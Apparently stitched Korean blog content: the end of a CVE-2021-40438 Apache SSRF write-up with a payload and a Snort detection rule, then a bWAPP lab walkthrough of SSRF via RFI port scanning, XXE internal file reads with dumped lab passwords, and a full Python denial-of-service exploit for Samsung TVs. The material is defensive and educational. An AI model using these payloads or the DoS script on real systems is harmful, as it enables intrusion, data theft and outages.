AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|https://victim"

 

3. 대응방안

3.1 서버 측면

① Apache HTTP Server 2.4.49 버전 이상으로 업그레이드

- 패치 코드는 2277, 2278 라인을 통해 사용자 입력값에 대한 길이 검증을 수행하는 것으로 판단됨

[사진 9] 패치 코드

3.2 네트워크 측면

① 공개된 PoC를 통해 탐지 정책을 적용

- "?unix:"와 "|http"를 사용하는 것이 확인됨

- "3a", "7c"는 각각 ":", "|"와 대응됨

alert tcp any any -> any any (msg:"Apache HTTP Server SSRF (CVE-2021-40438)"; flow:established,from_client; urilen:>200; content:"GET"; http_method; content:"/?unix|3a|"; http_uri; nocase; fast_pattern; content:"|7c|http"; http_uri;)

 

4. 참고

https://nvd.nist.gov/vuln/detail/CVE-2021-40438

https://github.com/sixpacksecurity/CVE-2021-40438

https://www.wangan.com/p/7fygfy122c313bee

https://cydrill.com/owasp/apache-ssrf-an-all-you-can-eat-reverse-proxy/

https://github.com/apache/httpd/commit/520dcd80a45ce237e9a46ee28697e1b8af3fcd7e

https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html

- https://firzen.de/building-a-poc-for-cve-2021-40438

- https://koromoon.blogspot.com/2021/12/cve-2021-40438-apache-http-server.html

1. SSRF (Server-Side Request Forgery)

- 서버 측에서 위조된 요청을 보내도록 하여 일반적으로 사용자들이 접근할 수 없었던 내부 자원에 접근하여 악성행위가 가능한 취약점

- 즉, 취약한 서버를 이용하여 공격자가 내부 서버에 원하는 요청을 전송하여 정보를 탈취하는 공격 유형

[사진 1] SSRF 동작 방식

- XSS (Cross-site Scripting) : 공격자가 삽입한 악성 스크립트가 사용자의 PC에서 실행
- CSRF (Cross Site Request Forgery) : 공격자가 삽입한 악성 스크립트가 사용자의 권한으로 서버에서 실행
- SSRF (Server-Side Request Forgery) : 공격자의 조작된 요청을 서버에서 실행

 

2. bWAPP 실습

- bWAPP의 SSRF에서는 3가지 유형에 대해 실습이 가능함

[사진 2] bWAPP SSRF

- 각 공격에 사용되는 파일은 3가지가 있으며, [사진 2]와 순서대로 대응

[사진 3] 시나리오 파일

2.1 RFI를 이용한 Port scan

- ssrf-1.txt 파일 이용

- fsockopen은 소켓 오픈 여부를 확인하는 PHP 함수로, 해당 파일은 ip 매개변수로 받은 IP에서 Open된 Port를 조회하는 파일임

echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";

if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "<span style=\"color:green\">OK</span><br/>";

        }

        else
        {

            echo "<span style=\"color:red\">Inaccessible</span><br/>";

        }

    }

}
?>

 

- Remote & Local File Inclusion (RFL/LFI)로 이동 후 Go를 클릭하면 URL이 다음과 같이 변경

[사진 4] RFI

http://192.168.56.109/bWAPP/rlfi.php?language=lang_en.php&action=go

- ssrf-1.txt에서 ip 매개변수가 필요한 것을 확인하였으므로, URL을 변경

① ssrf-1.txt 파일의 경로를 language 매개변수에 전달 > 포트스캔 수행

② ip 매개변수에 127.0.0.1 전달 > 루프백(자기자신=서버)

http://192.168.56.109/bWAPP/rlfi.php?language=http://192.168.56.109/evil/ssrf-1.txt&action=go&ip=127.0.0.1

- 위 URL로 요청을 전송 시 bWAPP서버에대한 포트 스캔 결과가 확인됨

[사진 5] 포트 스캔 결과

2.2 XXE를 이용한 내부망 자원 접근

- ssrf-2.txt 파일 내용 확인

# Accesses a file on the internal network (1)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>


# Accesses a file on the internal network (2)
# Web pages returns some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

 

2.2.1 Accesses a file on the internal network (1)

- SQL Injection - Stored (XML) 이동 및 프록시 설정 후 버프슈트 실행

[사진 6] SQL Injection XML

- [사진 6]에서 Any bugs? > 버프슈트 Send to Repeater > 내용 작성 > Send

- 해당 요청의 결과로 bWAPP서버에 설정된 robots.txt 파일의 내용이 노출됨

[사진 7] robots.txt 파일 노출

2.2 Accesses a file on the internal network (2)

- [사진 6]에서 Any bugs? > 버프슈트 Send to Repeater > 내용 작성 > Send

[사진 8] 200 OK

- [사진 8]에서 확인된 응답을 버프슈트의 Decoder에서 based64로 디코딩한 결과 /bWAPP/passwords/heroes.xml 파일의 내용이 노출됨

[사진 9] based64 디코딩

<?xml version="1.0" encoding="UTF-8"?>
<heroes>
	<hero>
		<id>1</id>
		<login>neo</login>
		<password>trinity</password>
		<secret>Oh why didn't I took that BLACK pill?</secret>
		<movie>The Matrix</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>2</id>
		<login>alice</login>
		<password>loveZombies</password>
		<secret>There's a cure!</secret>
		<movie>Resident Evil</movie>
		<genre>action horror sci-fi</genre>
	</hero>
	<hero>
		<id>3</id>
		<login>thor</login>
		<password>Asgard</password>
		<secret>Oh, no... this is Earth... isn't it?</secret>
		<movie>Thor</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>4</id>
		<login>wolverine</login>
		<password>Log@N</password>
		<secret>What's a Magneto?</secret>
		<movie>X-Men</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>5</id>
		<login>johnny</login>
		<password>m3ph1st0ph3l3s</password>
		<secret>I'm the Ghost Rider!</secret>
		<movie>Ghost Rider</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>6</id>
		<login>selene</login>
		<password>m00n</password>
		<secret>It wasn't the Lycans. It was you.</secret>
		<movie>Underworld</movie>
		<genre>action horror sci-fi</genre>
	</hero>
</heroes>

 

2.3 XXE를 이용한 삼성 스마트 TV 공격 (CVE-2013-4890)

- CVE-2013-4890는 Samsung PS50C7700 TV의 DMCRUIS/0.1 웹 서버에 GET 요청으로 A를 300개 설정 후 TCP/5600으로 전송하면 서비스가 중지되는 취약점

[사진 10] https://nvd.nist.gov/vuln/detail/CVE-2013-4890

- ssrf-3.txt 파일 내용

# Crashes my Samsung SmartTV (CVE-2013-4890) ;)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

 

- 공개된 PoC를 확인해보면, 취약한 삼성 스마트 TV에 A를 300개로 설정 및 TCP/5600로 요청을 전송하는 것을 확인할 수 있음

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   Tested successfully on my Samsung PS50C7700 plasma TV :)
 
import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description: Resets some Samsung TVs\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

 

- 공격 시연 YouTebe

https://www.youtube.com/watch?v=U-R2epNnUiM

 

3. 대응방안

① 입력값 필터링

- 서버 내부에서 접근해선 안 되는 값들을 필터링하거나 127.0.0.1, localhost, 사설 IP 대역 등을 블랙리스트필터링
- 허용된 도메인과 URL에 대해서만 접근 가능하도록 입력값을 화이트리스트 방식으로 필터링

- 우회 가능한 값들도 같이 필터링

 

② 중요한 정보가 포함된 경우 추가 인증을 적용

 

③ 중요한 정보가 포함된 서버 등을 분리

+ Recent posts